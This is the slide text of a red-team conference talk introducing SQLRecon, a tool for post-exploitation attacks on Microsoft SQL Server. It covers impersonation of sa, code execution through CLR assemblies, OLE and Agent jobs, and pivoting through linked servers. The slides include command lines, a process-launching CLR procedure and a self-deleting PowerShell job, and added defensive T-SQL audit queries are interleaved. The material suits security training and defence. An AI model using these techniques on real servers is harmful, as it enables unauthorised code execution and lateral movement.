Abusing MS SQL Using SQLRecon
Sanjiv Kawa
Way West Hackin' Fest 2022
1. Abusing MS SQL Using SQLRecon
Sanjiv Kawa, Adversary Simulation, IBM X-Force Red
May 6, 2022
2. whoami?
IBM Security / © 2022 IBM Corporation
Role » Adversary Simulation, IBM X-Force Red
Hobbies
3. Agenda
– Introducing SQLRecon (3 min)
– Demo 1: Basic Modules (2 min)
– Demo 2: Impersonation Attacks (4 min)
– Demo 3: Attacking Linked SQL Servers (4 min)
– Development Roadmap (1 min)
– Conclusion & Questions (1 min)
4. Introducing SQLRecon
5. What’s currently available?
A good number of offensive MS SQL tools already exist:
– metasploit
– crackmapexec
– PowerUpSQL
6. How did this research come about?
Like most tooling … to solve a problem encountered on an engagement
Also to address the MS SQL C# post-exploitation tooling gap:
– Modernize the approach
– Works with a diverse set of C2 frameworks
– execute-assembly and InlineExecute-Assembly compatible
7. Why bother attacking MS SQL?
Often overlooked
Often misconfigured
Builtin\Users can connect to MS SQL servers by default, and:
– Execute basic SQL commands
– Determine rights via user mapping/roles -> impersonation attacks
– UNC path injection: captured creds or SMB relay -> code execution
– Piggyback off rights to compromise linked servers
8. Demo Time
9. Demo 1: Basic Modules
10. Usage
Step 1: Set an authentication context
Step 2: Supply a module
SQLRecon.exe -a Windows -s SQL01 -d msdb -m whoami
SQLRecon.exe -a Local -s SQL01 -d msdb -u sa -p Password123 -m whoami
SQLRecon.exe -a Azure -r domain.com -d msdb -u jsmith -p Password123 -m whoami
11. Demo Context
12. Basic Modules
query
whoami
databases
tables
search
smb
Plenty more … (SQLRecon.exe -h)
13. Privilege Check
14. whoami
15. whoami ctd.
16. databases
17. tables
18. search
19. query
20. smb
21. Demo 2: Impersonation Attacks
22. Demo Configuration - Impersonation
Impersonate is a special permission
Enables a user or group to:
- Operate with the permissions of another user;
- As well as their own permissions.
23. Impersonation
SQLRecon.exe -a Windows -s SQL02 -d master -m impersonate
SQLRecon.exe -a Windows -s SQL02 -d master -m iwhoami -i sa
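The following is an added example, not part of the talk or of SQLRecon: the administrator-side audit of the IMPERSONATE grants that the impersonate and iwhoami modules above enumerate, at server and database scope. The principal names in the REVOKE lines at the end are placeholders.

```sql
-- Added example (not from the SQLRecon slides): list who may impersonate
-- whom, from the defender's side. Run as a sysadmin. Principal names in
-- the REVOKE statements at the bottom are placeholders.

-- Server scope: who may run EXECUTE AS LOGIN = '<target>'? Grants whose
-- target is a sysadmin (the '-i sa' case on the slide above) come first.
SELECT grantee.name      AS grantee_login,
       grantee.type_desc AS grantee_type,
       target.name       AS can_impersonate,
       sp.state_desc     AS permission_state,
       CASE WHEN IS_SRVROLEMEMBER('sysadmin', target.name) = 1
            THEN 'YES' ELSE 'no' END AS target_is_sysadmin
FROM sys.server_permissions AS sp
JOIN sys.server_principals AS grantee
     ON grantee.principal_id = sp.grantee_principal_id
JOIN sys.server_principals AS target
     ON target.principal_id = sp.major_id      -- major_id = impersonated login
WHERE sp.class_desc = 'SERVER_PRINCIPAL'
  AND sp.permission_name = 'IMPERSONATE'
  AND sp.state IN ('G', 'W')                   -- GRANT / GRANT WITH GRANT OPTION
ORDER BY target_is_sysadmin DESC, grantee.name;

-- Server-wide variant (SQL Server 2014+): IMPERSONATE ANY LOGIN is the
-- same right over every login at once, so it is worth its own check.
SELECT grantee.name AS grantee_login, sp.state_desc AS permission_state
FROM sys.server_permissions AS sp
JOIN sys.server_principals AS grantee
     ON grantee.principal_id = sp.grantee_principal_id
WHERE sp.class_desc = 'SERVER'
  AND sp.permission_name = 'IMPERSONATE ANY LOGIN'
  AND sp.state IN ('G', 'W');

-- Database scope (repeat in each database): who may run
-- EXECUTE AS USER = '<target>'? The borrowed rights stay inside this
-- database, but a grant on dbo still means full control of it.
SELECT grantee.name  AS grantee_user,
       target.name   AS can_impersonate_user,
       dp.state_desc AS permission_state
FROM sys.database_permissions AS dp
JOIN sys.database_principals AS grantee
     ON grantee.principal_id = dp.grantee_principal_id
JOIN sys.database_principals AS target
     ON target.principal_id = dp.major_id
WHERE dp.class_desc = 'DATABASE_PRINCIPAL'
  AND dp.permission_name = 'IMPERSONATE'
  AND dp.state IN ('G', 'W');

-- Remediation for a grant found above (placeholder names):
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [DOMAIN\lowpriv_login];
-- REVOKE IMPERSONATE ON USER::[dbo] FROM [lowpriv_user];
```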
24. impersonate
25. Custom CLR Assemblies
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    // Empty CLR stored procedure skeleton; the body is filled in on the next slide.
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void BaconTime()
    {
    }
}
https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
26. Custom CLR Assemblies
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void BaconTime()
    {
        // Demo payload: start notepad on the SQL Server host, inside the SQL Server process.
        Process proc = new Process();
        proc.StartInfo.FileName = "C:\\Windows\\System32\\notepad.exe";
        proc.Start();
    }
}
https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
27. ienableclr
28. Upload DLL to disk
29. iclr
30. idisableclr
31. Agent Jobs
Caveat:
- SQL Agent must be running
- Does not work with SQL Server Express edition
- Works with: Developer, Standard and Enterprise editions
32. iagentstatus
33. Agent Jobs
-- msdb procedures: create a one-step PowerShell job, run it once, then remove it.
EXEC dbo.sp_add_job @job_name = 'test_ps_job1';
EXEC sp_add_jobstep @job_name = 'test_ps_job1',
    @step_name = 'test_ps_name1',
    @subsystem = 'PowerShell',
    @command = 'powershell.exe start-process notepad',
    @retry_attempts = 1,
    @retry_interval = 5;
EXEC dbo.sp_add_jobserver @job_name = 'test_ps_job1';
EXEC dbo.sp_start_job 'test_ps_job1';
WAITFOR DELAY '00:00:05';
EXEC dbo.sp_delete_job @job_name = 'test_ps_job1';
34. iagentcmd
35. Demo 3: Attacking Linked SQL Servers
36. Demo Configuration - Links
SQL02 might be segmented from the network you’re on
A link could exist from SQL01 -> SQL02
Leverage SQL01 to issue queries on SQL02
37. Linked SQL Servers
SQLRecon.exe -a Windows -s SQL01 -d master -m links
SQLRecon.exe -a Windows -s SQL01 -d master -m lwhoami -l SQL02
38. links
SQLRecon.exe -a Windows -s SQL01 -d master -m links
39. lwhoami
40. ldatabases
41. ltables
42. lenableole
43. lolecmd
44. ldisableole
45. lsmb
46. Development Roadmap
47. To Do’s
– Expand Command Execution Techniques

Execution Technique     Standard   Impersonation   Linked
xp_cmdshell             ✅         ✅              ✅
OLE Automation          ✅         ✅              ✅
Custom CLR Assemblies   ✅         ✅              ❌
Agent Jobs              ✅         ✅              ❌
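Added example, not from the slides or the SQLRecon project: a T-SQL audit of the server settings and objects behind each execution technique in the table above and behind the linked-server demo (slides 36 to 45), so the same state can be read from the administrator's side. It assumes sysadmin rights; the 'clr strict security' row only exists on SQL Server 2017 and later.

```sql
-- Added example (not from the SQLRecon slides): audit the server-side
-- switches and objects behind each execution technique in the roadmap
-- table and behind the linked-server demo. Run as a sysadmin; queries 4
-- and 5 are scoped to the current database, so repeat them per database.

-- 1. sp_configure switches. The demo modules toggle 'clr enabled'
--    (ienableclr / idisableclr) and 'Ole Automation Procedures'
--    (lenableole / ldisableole); xp_cmdshell is the first row of the table.
--    Expect 0 for those three and 1 for 'clr strict security' (SQL 2017+,
--    the row is simply absent on older versions).
SELECT c.name,
       CAST(c.value_in_use AS int) AS value_in_use,
       CASE
            WHEN c.name = 'clr strict security' AND CAST(c.value_in_use AS int) = 1 THEN 'ok'
            WHEN c.name <> 'clr strict security' AND CAST(c.value_in_use AS int) = 0 THEN 'ok'
            ELSE 'REVIEW'
       END AS assessment
FROM sys.configurations AS c
WHERE c.name IN ('clr enabled', 'clr strict security',
                 'Ole Automation Procedures', 'xp_cmdshell');

-- 2. Agent jobs whose steps leave T-SQL. The slide-33 job uses the
--    'PowerShell' subsystem; 'CmdExec' is the other OS-shell subsystem.
--    Per slide 31 this only applies where SQL Server Agent exists.
SELECT j.name AS job_name, s.step_name, s.subsystem, s.command,
       SUSER_SNAME(j.owner_sid) AS job_owner, j.date_created
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('PowerShell', 'CmdExec')
ORDER BY j.date_created DESC;

-- 3. Linked servers (the SQL01 -> SQL02 hop). A mapping for all local
--    logins (local_principal_id = 0) to a fixed remote_name lends that
--    remote account to every local login; is_rpc_out_enabled is what
--    allows EXEC ... AT <link>, i.e. running procedures on the far side.
SELECT s.name AS link_name, s.data_source, s.is_rpc_out_enabled,
       CASE WHEN ll.local_principal_id = 0 THEN '<all local logins>'
            ELSE SUSER_NAME(ll.local_principal_id) END AS local_login,
       ll.uses_self_credential, ll.remote_name
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name;

-- 4. User-defined CLR assemblies in this database: the DLL uploaded on
--    slide 28 appears here once it is registered with CREATE ASSEMBLY.
SELECT a.name, a.permission_set_desc, a.create_date,
       USER_NAME(a.principal_id) AS owner_name
FROM sys.assemblies AS a
WHERE a.is_user_defined = 1;

-- 5. Procedures and functions bound to those assemblies (a CLR stored
--    procedure such as BaconTime on slides 25 and 26 shows up here).
SELECT OBJECT_SCHEMA_NAME(am.object_id) AS schema_name,
       OBJECT_NAME(am.object_id)        AS object_name,
       a.name                           AS assembly_name,
       am.assembly_class, am.assembly_method
FROM sys.assembly_modules AS am
JOIN sys.assemblies AS a ON a.assembly_id = am.assembly_id
WHERE a.is_user_defined = 1;
```

Each query reads only catalog views, so it can be scheduled as a recurring check and diffed against the previous run to spot a switch or object that was turned on and off between runs.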
48. Conclusion
49. Conclusion & Questions
Address the MS SQL C# post-exploitation tooling gap
Helps operators using C2 frameworks perform MS SQL attacks
@sanjivkawa
github.com/skahwah/SQLRecon